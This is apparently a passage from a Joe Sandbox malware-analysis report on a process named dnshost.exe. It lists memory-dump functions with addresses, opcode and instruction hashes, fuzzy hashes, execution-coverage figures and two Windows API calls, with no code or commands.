Instruction Fuzzy Hash: EC212275614208DFDB15DF68D980B26FB65EB88324F20C97DEA0A4B246C37BD807CA61

Function 012FD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2072951474.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_12fd000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d3d6b6fff3adf3dadc6e3f2b03ba52dabace3fbbdfcb0bd36477f64c449424d
Instruction ID: 7f59b96e7cea9146cb03a814859f9550daa4ef8af6a1c1880606f68bc01c3607
Opcode Fuzzy Hash: 4d3d6b6fff3adf3dadc6e3f2b03ba52dabace3fbbdfcb0bd36477f64c449424d
Instruction Fuzzy Hash: 68210779514208DFDB06DF98D9C0B26FB65FB84324F24C57DDA094B257C376D806CAA1

Function 073ED460 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d09aede4393130ce3b38bd25fcdb5fcd599e8d3105b1992b27c95f56992f6da
Instruction ID: 9bdb6be137aedb2c363ff7cb50d26ef2c6d31abb4558c02d64bbbfd84a881799
Opcode Fuzzy Hash: 2d09aede4393130ce3b38bd25fcdb5fcd599e8d3105b1992b27c95f56992f6da
Instruction Fuzzy Hash: B9315C702106118FD765DB28D858BA677E5FF85315F5584A9E04ECB3A1CF70AC8ACB40

Function 073EDBA7 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f45ceab329bdd9ce3997cd1592c51713fd21e6cdb9af12767ac682605f0f85d8
Instruction ID: e7957267f351984fc1694684aa4f8473bb7edebc3e2a0337ffdbcf9ce161f3c1
Opcode Fuzzy Hash: f45ceab329bdd9ce3997cd1592c51713fd21e6cdb9af12767ac682605f0f85d8
Instruction Fuzzy Hash: DD11D0F43211258BAB167B38945823E36AFAFC5991B08002AD80BCB3D4DF79CC4287C2

Function 073EDB10 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 434b0dcb5863c2792c9b391ead231f69e0a8ea393201a55da8c768dc4e958b57
Instruction ID: aea86afbe260045eadbaa3ad771b92228f3d1d23508641a869770274b0d86caf
Opcode Fuzzy Hash: 434b0dcb5863c2792c9b391ead231f69e0a8ea393201a55da8c768dc4e958b57
Instruction Fuzzy Hash: CE1127713206119FD716DB2CE44476D7BEAFF85620F04962DD44ACB2A1EB709C81CF50

Function 073EB4E0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04ed78178e5b0dc04e249b768b4f39ac0ac040ffce433fbeec16d1356675714e
Instruction ID: 23f30fcc3049c28d23c8a3c5277b39f3b7e9d0aa60e1c732b8fc74d89e6e1ed0
Opcode Fuzzy Hash: 04ed78178e5b0dc04e249b768b4f39ac0ac040ffce433fbeec16d1356675714e
Instruction Fuzzy Hash: 35117CB0B006518FD715DF39C89096AF7F6BF88614B208A6DD05A8B3A1CB71EC06CB52

Function 012FD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2072951474.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_12fd000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 132f171f61138ad712d7a619ed6f42fb7eabf739cf58823bf71ae1f3d4158604
Instruction ID: 9928fb48f71156b3559609ec591d0692371e5ccf9f14d975bf40022b233db846
Opcode Fuzzy Hash: 132f171f61138ad712d7a619ed6f42fb7eabf739cf58823bf71ae1f3d4158604
Instruction Fuzzy Hash: 63217C755093848FDB03CF24D994715BF71EB46314F28C5EED9498B2A7C33A980ACB62

Function 073ED218 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb14d57e6827125621329535b8f26fa182d213ee8186d8f03da298570a784bec
Instruction ID: aee60e817b3fdb5be0748a7bf90ed5342638f3d16d37b425835c1d006a9e3669
Opcode Fuzzy Hash: bb14d57e6827125621329535b8f26fa182d213ee8186d8f03da298570a784bec
Instruction Fuzzy Hash: 45119DB1320629CFD724AF78C49086DB7BAEF8621171005BDE00ACB2B0DA31DC85CB61

Function 073E7DA4 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06d3c0932161c633636956a97c11a38b1bb37717c08dc04a6714353f2c983533
Instruction ID: 5261eb271fb46e9fca5959670dec6d8ca9c809fa429cd1a324c6d7f06ce67bf4
Opcode Fuzzy Hash: 06d3c0932161c633636956a97c11a38b1bb37717c08dc04a6714353f2c983533
Instruction Fuzzy Hash: 92114375721614CFDB05DF28D4889A9BBF9FF89214B1280A9E10ACB2B1DB32EC41CB40

Function 073EDA27 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3daa2103f7b4664eb88a2146aff899a9da487b8bb0d3dfa6fe0ca6532f76eb41
Instruction ID: 633b69c98496cd61dc545f1eb74aee0ec2d1c84ab7018c81bf3af888b7540c7d
Opcode Fuzzy Hash: 3daa2103f7b4664eb88a2146aff899a9da487b8bb0d3dfa6fe0ca6532f76eb41
Instruction Fuzzy Hash: 6611E0717047518FC726A77CD41439E7BE6AF81320F04856EC19ACB2C6DF789D468785

Function 012ED4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2072882035.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_12ed000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction ID: 049e668341fe3091e6933c1ad73475c0197276c96190f18b8b7acb46e1a91bd1
Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction Fuzzy Hash: 8B110376404284CFCB12CF54D9C4B16BFB1FB84324F24C6A9D9090B257C33AD45ACBA1

Function 012ED3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2072882035.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_12ed000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction ID: 5e74de11dacb9a64125d4d9099fb3ea38fb1c810fb1c92a11d56f5905a0ed8af
Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction Fuzzy Hash: A8110376404285CFDB02CF44D5C4B56BFB1FB94324F24C2A9D9090B257C33AE45ACBA1

Function 012FD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2072951474.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_12fd000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction ID: 1728d00638d923a6907e783e8e520cd5841271c1900aae392766c7a970c50d20
Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction Fuzzy Hash: C711BB7A504284DFDB02CF54C5C4B15FBA1FB84324F24C6AEDA494B297C33AD40ACBA1

Function 073ED208 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7652318ad5152884390f1ae75c490ea6171ea451ffec55a1b64a2ff518e4a43b
Instruction ID: 73f7902b9432dbdfbcb7950f8a66bdb3d543631b6645c567171e26f0e9864ce1
Opcode Fuzzy Hash: 7652318ad5152884390f1ae75c490ea6171ea451ffec55a1b64a2ff518e4a43b
Instruction Fuzzy Hash: 2F01D4B2310225CFD724DF69D480969B7F9FF8A211B04017EE41ECB3A0DA31D985C761

Function 012ED745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2072882035.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_12ed000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f1aca26ebc4cbfa76a61e10237c1ebac4abce236c91530c43f8cbe5f2cf57eb
Instruction ID: 994601b8f1a1e236374f4f03a5730fd5d79dd58c1126ac22a296b24f193a90d4
Opcode Fuzzy Hash: 8f1aca26ebc4cbfa76a61e10237c1ebac4abce236c91530c43f8cbe5f2cf57eb
Instruction Fuzzy Hash: 0B012B710583899AE7158F69CDC8B26FFE8DF41330F58C51AEE090A287D2799840C671

Function 073E4100 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ee1510eb82d1498ea3cbca5a4346a20b6918cea8e18b0695e5e523f1e922b8f
Instruction ID: c43209a8782ce1132e697c24fa21b138c23218ac4acf6e038159771a9012a6d6
Opcode Fuzzy Hash: 5ee1510eb82d1498ea3cbca5a4346a20b6918cea8e18b0695e5e523f1e922b8f
Instruction Fuzzy Hash: 36018F70300315CFDB25DB68D844E6AB3E9EFDA221FA0C579E4098B2A1DB71EC06CB54

Function 073E4110 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dce7df24608e62299b257bf08e56aa4758ff3f385517536d088a35dd28e0e45f
Instruction ID: 2c8b6f60a9bf05a4a1169aa4f9a887ca959b006375345f607b2193e69663cece
Opcode Fuzzy Hash: dce7df24608e62299b257bf08e56aa4758ff3f385517536d088a35dd28e0e45f
Instruction Fuzzy Hash: 410181703103158FDB15DB69D444D2AB3EAEFCA221B60C4B9E409C73A1DB71EC02CB50

Function 073E7E50 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 804ccc922ec7a45bbbdcac980d41f64469319bf1812b400004c8286078701104
Instruction ID: ea42ff607a2317eef03a7632160d42f8a30dddebdd328d63c9bb6eb504168355
Opcode Fuzzy Hash: 804ccc922ec7a45bbbdcac980d41f64469319bf1812b400004c8286078701104
Instruction Fuzzy Hash: 66F02EB43317125BD72557285458265BB5AE7C1260F05436AD10AC72D0DF39CC028391

Function 073EA37F Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2151cd1df8e0db5eb9c98ccf2580ce64868e0ea05bdeba54cc42612cf4fc086d
Instruction ID: 5a81d0478c1546692d7e7478738a017f964a13068f8110c4af15a37d3bf243f7
Opcode Fuzzy Hash: 2151cd1df8e0db5eb9c98ccf2580ce64868e0ea05bdeba54cc42612cf4fc086d
Instruction Fuzzy Hash: E7F0F6F23842654FD701DE58F8459E43BB8EB01311B4600D6E5088B662DF26E8438B81

Function 073E5DD7 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 595b6cfc27af2b4699d01117a4c5dafcc5d5fe4e6f611f4794007838c4096b0a
Instruction ID: 893945d4123e0877c6605308746b27af2476a55b1f89c3385096aabbaf854b84
Opcode Fuzzy Hash: 595b6cfc27af2b4699d01117a4c5dafcc5d5fe4e6f611f4794007838c4096b0a
Instruction Fuzzy Hash: 47F0C8B26011229FD324DF14E8496FAFFD8FF89621F05467AE41D87291C721C816C7D2

Function 073E7DB0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dfce034d2b5d18cdf8e1230d991714babdc02601f795b3d0c6c1136066c0ab3
Instruction ID: 7202041829aad837c09f3dcf675506f40802c7bf58ea3c5d28d90778f62ae4e8
Opcode Fuzzy Hash: 0dfce034d2b5d18cdf8e1230d991714babdc02601f795b3d0c6c1136066c0ab3
Instruction Fuzzy Hash: 32011476B11210CFDB19DF28D4848A9B7FAFF8871575680AAD50A9B261DB32EC40CB51

Function 012ED744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2072882035.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_12ed000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d310afe3728273c9a5e6f9ad01d9144e2d40d715ea5378efb84f77acc9ebda0
Instruction ID: ca929e0ce782e52bc1e6e21e8018af35bedb1aed5658ed2e4bd187d97341cc12
Opcode Fuzzy Hash: 4d310afe3728273c9a5e6f9ad01d9144e2d40d715ea5378efb84f77acc9ebda0
Instruction Fuzzy Hash: 9AF06272404385AAEB158F19CDC8B62FFE8EB51634F58C55AFE484A286C2799844CAB1

Function 073EDB40 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b3023efc48fde663889588887f98d549a1ce785d4d6052cdc1b8e4ec546f0c
Instruction ID: 5d7d4c84c718d9b7d630eddb8bd4ba0752015e584ee8dbd5d9a698c6031f0225
Opcode Fuzzy Hash: 02b3023efc48fde663889588887f98d549a1ce785d4d6052cdc1b8e4ec546f0c
Instruction Fuzzy Hash: 7CF09AB03201668FD625D62DC800B6E37DEEBC1A50F040029D54ACB391EF309C018B91

Function 073E56C9 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e3f35f28545d9da62f4cf501db4ce00b8f5c02e3a8eb339765c1d4f0c97028
Instruction ID: 177c4924f6ca0fa19a47f5fee974dde559d1a939db048cb3dfd9a4019bff208f
Opcode Fuzzy Hash: c3e3f35f28545d9da62f4cf501db4ce00b8f5c02e3a8eb339765c1d4f0c97028
Instruction Fuzzy Hash: E6F08276300205EBDB05AF28E844EEA77F9EB8A355B244479E5048F224DB79DC51D7A0

Function 073E5DC3 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73a61e74aea56c34ccc825c5d333863e2662f3a4ecdd7cd73bd31ededad011e1
Instruction ID: 6582b5fef04085aa0c42e0437df7eb7e1e74b7f3d07f8604eb005479c43667ce
Opcode Fuzzy Hash: 73a61e74aea56c34ccc825c5d333863e2662f3a4ecdd7cd73bd31ededad011e1
Instruction Fuzzy Hash: ABF0B4B2204253CFC72A8E38E9442F5FB95EF96225F4C42FAD01D8B1E2C7258465C751

Function 073E503A Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 642ff22a584aa61e67d469fcd5a3a01106ba797d6b545b4b788430e8376258ac
Instruction ID: 3ead7d3b069216b89a3c3ef112e25bc7afab0b4993df1f6eab5f8e58db62a775
Opcode Fuzzy Hash: 642ff22a584aa61e67d469fcd5a3a01106ba797d6b545b4b788430e8376258ac
Instruction Fuzzy Hash: 28F06DB0620125CFEB109A58D8447E837B8BB0432AF000065F009D75D0DB749996CFA2

Function 073E56D8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f6f2e4d12c020bb1ff922fc693418f033cde8209e4025a3c1568186ebba3704
Instruction ID: c92a1d10b7e6c25458c875426bb6c130086743833b2b83ac9d462a46363f5974
Opcode Fuzzy Hash: 7f6f2e4d12c020bb1ff922fc693418f033cde8209e4025a3c1568186ebba3704
Instruction Fuzzy Hash: 06F03075301216DBDB05AF69E844CAA77EAEF893563104469E5088F224EA75EC51CBA0

Function 073E7E80 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b0b5a4d328014ca131bc3f4ebe926539054772bbbef8628b97cfef00e15774f
Instruction ID: 834e2e10b94338e58951c1dac435b5a9536ea1e4538adc6debe7e72ba476593b
Opcode Fuzzy Hash: 2b0b5a4d328014ca131bc3f4ebe926539054772bbbef8628b97cfef00e15774f
Instruction Fuzzy Hash: ABE086F9731226179B19236D545453E36CF8BC55A1315417AE60DC7384DF38CC0143A2

Function 073EA3A7 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca5461e7895a98ba3286bca8118085bacef52e749463a55318361287cb6ff29
Instruction ID: 60551196e6342166a636d2adf079c03ca2caae792c71c10ee971d2ca149237ef
Opcode Fuzzy Hash: eca5461e7895a98ba3286bca8118085bacef52e749463a55318361287cb6ff29
Instruction Fuzzy Hash: 59E0DFB1100314DFC7118BADE8846617FE8AB46724F44C6A5F10C8B2A6CA73F852CA92

Function 073E5680 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02fc6be455bbd618eb36267932ab8437b775fb16716340445c1c3df3aa192a64
Instruction ID: bf505dca9474ac80e73ad612501b6be0ac15ff2176d9d7742bba4815eb78a893
Opcode Fuzzy Hash: 02fc6be455bbd618eb36267932ab8437b775fb16716340445c1c3df3aa192a64
Instruction Fuzzy Hash: 77F0A575D0010CABCB54EFA4E6456DDBBB5EB48200F1081A6D809A3244E7345B469B80

Function 073E3C30 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4835bcdf6e51b15bdbf6cdfe93b3eb113e0853a9deebab86811a3bd07cb16b57
Instruction ID: ddc2baef98c2d540d5823c023ffba1134380f25513b7a0bc127b0b664360dc7e
Opcode Fuzzy Hash: 4835bcdf6e51b15bdbf6cdfe93b3eb113e0853a9deebab86811a3bd07cb16b57
Instruction Fuzzy Hash: 42E08631250620CFE7285B38D04ABE937E5EB45725F04406AE40DC7392CF6888458B80

Function 073E4FFE Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81f388fe2a1839f7e436c3a8f0e9e3e2265018ddf6e6218a04e7392799e5f064
Instruction ID: ffc764191133cbf52ea84aca6b91e7b8bdfd381dd4896e30630a15599cfc5ee4
Opcode Fuzzy Hash: 81f388fe2a1839f7e436c3a8f0e9e3e2265018ddf6e6218a04e7392799e5f064
Instruction Fuzzy Hash: 4DE01A71600026CFDB149A68E848BE837B5BB44266F4040A5F009DB1A0DB759996CF91

Function 073E3C40 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 299c6f6555c5417282a9dcef78e14c93414354a25c91d517c082918803606fe7
Instruction ID: c57da03e1c4ebcfcd6a5bf98c58387dce6d0a17e4aadd6f739eaf20822f7cadd
Opcode Fuzzy Hash: 299c6f6555c5417282a9dcef78e14c93414354a25c91d517c082918803606fe7
Instruction Fuzzy Hash: 0AD01234754524CFD6185B39D448BA933D9AB44B25F044069E40D873A2CE609C408BC1

Function 073E42E0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e63be36b18d432f37cfd40f67ebaedc7db4eefc627354facd3eb29424678f623
Instruction ID: f21d5f91a44459835d2801ee62e94d79ab80093ab3a97afa2538de26914b0d17
Opcode Fuzzy Hash: e63be36b18d432f37cfd40f67ebaedc7db4eefc627354facd3eb29424678f623
Instruction Fuzzy Hash: FED0A773200309AFEA409F94DC44F953B29B718260F809204FA59AB6A2C772F852D754

Function 073EA3B8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 225dbaf3f4afe0b3c0a96a6f01025a0070cc1b372c78dd91d92630b56aea577e
Instruction ID: 50c04da146c6fdfe80172ad8f59178627b10d4bfaef9aff948723ea0c62e9f89
Opcode Fuzzy Hash: 225dbaf3f4afe0b3c0a96a6f01025a0070cc1b372c78dd91d92630b56aea577e
Instruction Fuzzy Hash: 6BD012B0200214CFC701DB68EA848217BA8EF49708359C5A8E00C8F233DB73EC42CA90

Function 073E42F0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb462f2106ad202cec666d76f8d1cf946752ec92badd6b44ecc971d537d8c808
Instruction ID: 11d933aea5d5ca19730bd569df53272d249eef9b979e52ac7b657446ae569a30
Opcode Fuzzy Hash: eb462f2106ad202cec666d76f8d1cf946752ec92badd6b44ecc971d537d8c808
Instruction Fuzzy Hash: BEC01236200208AFDA80AA94C800D967769AB18610F509004BA080A211C672E8A2DBA4

Analysis Process: dnshost.exePID: 7800, Parent PID: 7680COMMON

Execution Graph

Execution Coverage:	6.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	65
Total number of Limit Nodes:	4

Executed Functions

Function 0130AD88 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0130AFDE

Memory Dump Source

Source File: 00000011.00000002.2136319428.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1300000_dnshost.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1a424523d12a5bcdcfe5b1fcef41c0c8929cbda50c66ceca31b6e3985216d478
Instruction ID: 59bfccf4183c50514ece837e1aa860f921d9d059d783b08f7e4b8d7f515f81c2
Opcode Fuzzy Hash: 1a424523d12a5bcdcfe5b1fcef41c0c8929cbda50c66ceca31b6e3985216d478
Instruction Fuzzy Hash: 747137B0A00B058FDB25DF29E46575ABBF5FF88304F008A2DD58AD7A90DB74E945CB90

Function 0130B770 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0130D626,?,?,?,?,?), ref: 0130D6E7

Memory Dump Source

Source File: 00000011.00000002.2136319428.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1300000_dnshost.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
